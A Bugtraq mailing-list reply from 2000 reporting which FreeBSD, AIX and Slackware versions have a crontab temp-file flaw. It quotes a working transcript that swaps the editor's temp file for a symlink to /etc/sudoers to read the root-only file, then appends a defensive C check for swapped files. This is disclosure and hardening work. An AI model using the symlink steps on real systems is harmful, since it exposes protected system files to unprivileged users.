[17344] in bugtraq
Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
daemon@ATHENA.MIT.EDU (Fabio Pietrosanti (naif))
Wed Oct 25 13:40:26 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0010251221420.7175-100000@naif.inet.it>
Date: Wed, 25 Oct 2000 12:30:47 +0200
Reply-To: naif@inet.it
From: "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT>
X-To: Sergey Nenashev <alf@ISD.MEMONET.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <39F5BF01.3AE80375@isd.memonet.ru>

Tested also on:

FreeBSD 3.3 = Vulnerable
FreeBSD 2.2.8 = Vulnerable
AIX 4.2 = Not Vulnerable
Linux Slackware 7.0 = Not Vulnerable
Linux Slackware 4.0 = Not Vulnerable

naif

On Tue, 24 Oct 2000, Sergey Nenashev wrote:
> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
>
> Can read any file which starts with the comment symbol (#)
>
>
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make symbolic link]
> > rm /tmp/crontab.hLmjTbK417
> > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> > exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
>
>
>
> If the file started with no # then crontab said
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
>
>
>
> --
> ------
> Alf Delems<alf@isd.memonet.ru>
>
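
Added example, not part of the thread and not taken from any crontab source: one way a privileged program can refuse to read back an editor temp file that was replaced while the editor was running, as in the transcript above. It assumes the program re-opens the temp file by path after the editor exits and still has the `stat` data from when it created the file; `reopen_edited` and `demo_case` are hypothetical names, and the files in `demo_case` are constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Re-open the edited temp file only if it is still the regular file we
 * created: same device/inode, single link, and (assumption) owned by the
 * invoking real uid. Returns an fd, or -1 if the path was swapped. */
int reopen_edited(const char *path, const struct stat *orig)
{
    struct stat now;
    int fd = open(path, O_RDONLY | O_NOFOLLOW); /* fails on a symlink */
    if (fd < 0)
        return -1;
    if (fstat(fd, &now) != 0 || !S_ISREG(now.st_mode) ||
        now.st_dev != orig->st_dev || now.st_ino != orig->st_ino ||
        now.st_uid != getuid() || now.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: create a temp file in a private directory, optionally
 * replace it with a symlink to a second file, then try to re-open it.
 * Returns 1 if accepted, 0 if rejected, -1 on setup failure. */
int demo_case(int swap_for_symlink)
{
    char dir[] = "/tmp/cronex.XXXXXX", tmp[PATH_MAX], other[PATH_MAX];
    struct stat orig;
    int fd, ofd, rfd;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(tmp, sizeof tmp, "%s/crontab.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    fd = open(tmp, O_RDWR | O_CREAT | O_EXCL, 0600);
    ofd = open(other, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || ofd < 0 || fstat(fd, &orig) != 0)
        return -1;
    if (swap_for_symlink && (unlink(tmp) != 0 || symlink(other, tmp) != 0))
        return -1;
    rfd = reopen_edited(tmp, &orig);
    if (rfd >= 0) close(rfd);
    close(fd); close(ofd);      /* original fd stayed open, so its inode was not reused */
    unlink(tmp); unlink(other); rmdir(dir);
    return rfd >= 0;
}
```

The inode comparison also rejects editors that save by writing a new file and renaming it over the original, so a program using this check has to require in-place editing or report that case to the user.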